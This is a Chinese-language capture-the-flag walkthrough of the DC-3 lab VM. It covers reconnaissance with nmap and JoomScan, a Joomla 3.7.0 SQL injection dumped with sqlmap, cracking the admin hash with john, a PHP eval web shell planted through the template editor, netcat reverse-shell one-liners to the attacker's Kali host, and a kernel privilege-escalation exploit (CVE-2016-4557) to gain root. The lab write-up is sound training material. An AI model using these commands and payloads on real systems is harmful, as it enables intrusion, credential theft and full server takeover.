DC-3实验

1. 渗透靶场

信息收集：

ifconfig先查看靶机IP 192.168.246.129

2.寻找靶机真实

nmap  -sP 192.168.246.129/24

所以靶机的真实IP为192.168.246.131

192.168.66.1 vm8网卡

192.168.66.2 网关

192.168.66.142 靶机

192.168.66.254 DHCP服务器

192.168.66.139 kali本机

3.信息收集:谈端口及服务

nmap -A -p- -v 192.168.246.131

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项，它会给出扫描过程中的详细信息

发现开放了80端口，存在web服务，Apache/2.4.18，CMS为Joomla

DC-3实战中只有一个目标获取root权限

4.利用JoomScan进行扫描获取后台地址

    由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla，我们可以采用joomscan进行扫描，如果我们不知道是joomla，我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

1.JoomScan简单使用

执行默认检测：

perl joomscan.pl --url www.example.com

perl joomscan.pl -u www.example.com

枚举已安装的组件：

perl joomscan.pl --url www.example.com --enumerate-components

perl joomscan.pl -u www.example.com –ec

设置cookie：

perl joomscan.pl --url www.example.com --cookie "test=demo;"

设置user-agent：

perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

perl joomscan.pl -u www.example.com -a "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

设置随机user-agent

perl joomscan.pl -u www.example.com --random-agent

perl joomscan.pl --url www.example.com -r

更新JoomScan：

perl joomscan.pl –update

2.joomScan扫描

joomscan --url http://192.168.246.131  提示没有joomscan 选择y安装

扫描结果如下

知道了joomla cms版本为3.7.0
得到了网站后台地址http://192.168.246.131/administrator/

3.利用nikto扫描获取后台地址

nikto --url http://192.168.246.131/

6.查找漏洞发现存在SQL注入

    我们前面知道了CMS为joomla，版本为3.7.0

使用searchsploit检查到有对应的漏洞

searchsploit joomla 3.7.0

我们发现有一个SQL注入，还存在一个XSS

searchsploit -m 42033.txt

验证一下,把localhost修改为我们的靶机IP就行

http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示，数据库语句错误，说明进行了拼接，存在sql注入

7.1.跑出所有数据库

sqlmap -u "http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

扫描结果，把数据库跑出来

2.获取当前数据库的名字joomladb

sqlmap -u "http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

2.获取当前数据库的名字joomladb

sqlmap -u "http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

观察表名，很明显，有users这张表

4.4.获取joomladb的users表的字段名

sqlmap -u "http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个，直接回车使用默认的“Y”

第二个，使用“y”，不要使用默认的，不然会出

第三个随意

第四个使用10线程

最终跑出来6个字段

5.获取目标字段username和password

sqlmap -u"http://192.168.246.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

6.利用john爆破密码snoopy

创建一个1.txt，把加密的密码字段写入

使用john破解出admin密码是snoopy

7.利用获取到的账号密码进行登录

http://192.168.246.131/administrator/

admin/snoopy

登陆成功

8.上传webshell

发现一个上传点

点击Beez3 Details and Files进入

点击newfiles

这儿我们发现可以上传文件，考虑上传木马，也可以创建文件进行编辑

要上传木马，我们先要找到当前文件所在的目录：

在html下创建一个php文件，名字叫做shell

  创建成功之后，跳到编辑页面，然后我们输入php一句话，点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

再次访问http://192.168.246.131/templates/beez3/html/
发现多了一个shell.php文件，我们访问一下

访问webshell，得到我们设置的会先内容，文件上传成功

http://192.168.246.131/templates/beez3/html/shell.php

9.蚁剑管理webshell

    右键添加数据

右键进入虚拟终端执行whaomi查询我权限，是www-data权限

10.反弹shell到kali

   1.kali监听

nc -lvvp 1234

2.靶机连接

nc -e /bin/bash 192.168.66.139 1234 

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.139 1234 >/tmp/f

11.创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

12.使用辅助脚本发现提权漏洞

1.下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址：

https://github.com/mzet-/linux-exploit-suggester

2.上传辅助脚本

    我们直接在蚁剑中上传

上传成功

3.发现漏洞

ls -l linux-exploit-suggester.sh

发现没有执行权限，我们给他加个执行文件

chmod +x linux-exploit-suggester.sh

    执行脚本

./linux-exploit-suggester.sh

发现很多可利用漏洞

13.使用辅助脚本提权

1.获取提权脚本

    上面发现了很多漏洞，这里我们挑一个进行提权

挑选CVE-2016-4557

在图片里可以看到是一个39772的文件，由于给出的那个URL无法下载

也可以去searchsploit里面去看看  

可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

3.提权

    解压文件

unzip 39772.zip

cd 3379

ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

/compile.sh

./doubleput

执行完之后，提权成功

获得root权限

14.发现the-flag.txt

ls

cat the-flag.txt